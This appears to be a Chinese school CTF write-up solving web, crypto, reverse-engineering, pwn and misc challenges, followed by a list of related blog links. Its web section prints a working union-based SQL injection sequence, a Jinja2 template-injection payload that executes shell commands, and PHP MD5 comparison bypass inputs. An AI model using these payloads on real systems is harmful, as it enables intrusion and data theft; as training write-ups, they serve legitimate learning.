校内CTF比赛WriteUp
Web
- 签到2
- 口算小天才
- easy php
- 录取查询
- 我爱python
Crypto
- easy crypto
- bAcOn
Re
- easy re
- 跳到对的地方
- 简单的xor
Pwn
- easy pwn
- 莽撞人
Misc
- drop the beats
- 拼东东
- 消失的50px
签到2
看源代码底部就能知道前面一段flag 在将input的size和maxlength去掉提交就可以得到下一段flag
口算小天才
在1-3秒内答题 口算好可以直接做 不然也可以写python脚本自动提交数据 注意session的获取就行
easy php
vim写的 明示有swp文件 index.php.swp 得到源码
<?php
header("content-type:text/html;charset=utf-8");
$a = @$_GET['a'];
$b = @$_GET['b'];
$c = @$_GET['c'];
$a_md5 = @md5($a);
$b_md5 = @md5($b);
if(isset($a) && isset($b)){if ($a != $b && $a_md5 == $b_md5) {if (($c<9999999999 || (string)$c>0)==false) {echo "xgctf{xxxxxxx}";}else {echo "Sorry, just think more";}} else {echo "Sorry, you are wrong";}
}
else{echo "这是第一个我用vim写的网站哦";
}
?>
三个变量 a b c.其中 a b要求值不同但md5相等 可以直接用a=240610708&b=QNKCDZO相似md5过验证 理论也可以传数组过验证 c既要大于9999999 又要小于0 可用数组 NULL==FALSE 交提就拿flag
录取查询
sql注入题
简单测试下 发现基本没有关键词过滤 直接注入就行
似乎第二个input才是执行的代码 第一个仅仅只是用来填模板的 所以要在下面注入
1’ or 1=1 order by 7 #可以知道有7列
1’ union select 1,2,3,4,5,user(),database() #数据库是school
1’ union select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema= ‘school’#得到table_name
1’ union select 1,2,3,4,5,6,flag from flag #猜测字段名是flag即可
我爱python
网页源码提示是用来flask的 也没有关键词过滤 可以直接执行系统命令
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("ls").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}
看到有flag这个文件 cat之后得到flag
easy crypto
a3RwZ3N7b25mcl82NF9uYXFfZTBnXzEzfQ==
base64解密后 ktpgs{onfr_64_naq_e0g_13} 像是flag 但flag是xgctf开头的
ktpgs和xgctf每个单词相差13或-13 所以枚举每个位置单词的所有可能 然后凭感觉组合(#.#)
bAcOn
如题是培根加密 大写字母1小写字母0 然后在http://rumkin.com/tools/cipher/baconian.php解密就行
easy re
拖OD搜中文
解密这一串字符就可以
跳到对的地方
搜中文后可以看到提示
直接jmp到段首 然后跟到段尾 flag就出现了
简单的xor
拖OD找到关键句 所以要分析算法
那就去IDA F5
分析可知输入的每个字符跟v10开始的数组进行异或 再跟v32比较 相等就正确 输入的就是flag
因为异或在异或就是本来的数据 所以只要v32跟v10数组再次异或就OK
easy pwn
这是main函数 linux的ida似乎没有F5?TOT
这道题主要是让输入的buf覆盖var4的值 所以我们需要C-4个字母加上7E3就可以骗到flag
莽撞人
跟上面的有点不同 这是让我们用栈溢出来执行CALL
这是我们的目标 地址是 08048466
也就是让给EBP这个值 参考https://www.jianshu.com/p/7f18c0db8e68
用peda可以算出溢出值 20
代码:
drop the beats
音频隐写 刚好我电脑装了Au 随便看几个音频参数 就可以发现flag在这里
拼东东
zip损坏 在压缩包头部补上文件头即可
消失的50px
题目给了提示 要求高度补上50px
将 修改为190可以看到flag
校内CTF比赛WriteUp相关推荐
- “百度杯”CTF比赛 十月场 writeup
"百度杯"CTF比赛十月场 Misc 那些年我追过的贝丝 我要变成一只程序员 剧情大反转 challenge 据说是rc4算法 try again 表姐家的签到题 泄露的数据 考眼 ...
- ctf比赛/学习资源整理,记得收藏!
最近CTF比赛很多,对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具 首先给大家推荐我自己常用的3个CT ...
- 5月全球CTF比赛时间汇总来了!
● 5月全球CTF比赛时间汇总来了! ● 从事网络安全行业工作,怎么能不参加一次CTF比赛了! 小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣! 下面给大家分享一下5月份CTF比赛时间,比赛按时 ...
- 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容 ...
- 论学生/战队/社团如何举办CTF比赛
说在前面: 本人一名在校菜鸡,磕磕绊绊的办了一次ctf比赛,希望接下来的东西可以帮到你,说的不对的地方,请多多指点.11月份中旬比赛,以此为例 9月上旬确定公文.搞清举办比赛的主办方,你是想以自己战队 ...
- 2月国内外CTF比赛时间汇总来了!
● 从事网络安全行业工作,怎么能不参加一次CTF比赛了! 小编作为一个CTF比赛老鸟,以每次都能做出签到题为荣! 下面给大家分享一下2月份CTF比赛时间,比赛按时间先后排序,国内国外的都有哦! 文章末 ...
- 第五空间CTF初赛WriteUp By EDISEC
第五空间CTF初赛WriteUp By EDISEC Web 5_web_Eeeeasy_SQL 5_web_BaliYun 5_easylogin 5_web_letmeguess_1 Misc s ...
- 如何开始你的CTF比赛之旅
在过去的两个星期里,我已经在DEFCON 22 CTF里检测出了两个不同的问题:"shitsco"和"nonameyet".感谢所有的意见和评论,我遇到的最常见 ...
- php定时执行代码漏洞_在CTF比赛中发现的PHP远程代码执行0day漏洞
众所周知,CTF比赛都是人为构造漏洞环境,人为制造安全漏洞,供安全从爱好者研究,好磨练和增强自己的安全技能. 参加CTF比赛,通常你需要明白出题人的想法,按照出题人的意图来解开谜题. 但是,就像所有的 ...
最新文章
- Codeforces Round #369 (Div. 2)
- SQL Server故障排除圣经
- linux平台下rpm方式和源码包方式安装mysql5.7
- linux 的内核参数优化,linux 内核参数优化
- Delta Lake——数据湖的可靠性
- 第四代Express框架koa简介
- 6.C语言迷宫程序界面版
- Docker(三) 使用容器数据卷实现数据持久化与容器数据共享
- c语言读取excel表格_利用pandas处理excel表格
- 一台机器起多个filebeat_机器人开发 | TechX 2020
- 排序算法入门之堆排序
- html利用cookie登陆,前端登陆注册实现——利用cookie模仿后台数据库存取数据
- 面向对象编程时,十条原则:
- 信贷违约风险预测(四)TrAiNiNG MoDeL
- DSP 6678的中断系统
- iOS/Android开发人脸识别SDK列表
- 如何快速删除 Word 文档中的分节符
- H3C网络流量镜像配置
- tomacat 上传图片崩溃问题
- 关于IDEA中使用git更新代码,会覆盖掉未提交的新代码解决问题
热门文章
- 【网页制作】制作百度网盘登录页
- 科学家发现:意念对健康的影响,大到不可思议
- buu 达芬奇 ROT
- oracle多条件分组查询数量_ORACLE分组查询和统计等
- 韶关学院计算机科学学院简介
- 韶关学院计算机专插本专业怎么样,2020年韶关学院专插本各专业计划人数和报考人数情况分析...
- action请求_可可Radio第2848期:高效“懒人”的习惯-使用邮件发送请求(2)_可可之声...
- 广义相对论的数学公式 | Mathematical formula of general relativity
- 基于Jeecgboot前后端分离的ERP系统开发系列--出库单(1)
- OSTA-LINUX3-操作题练习题整理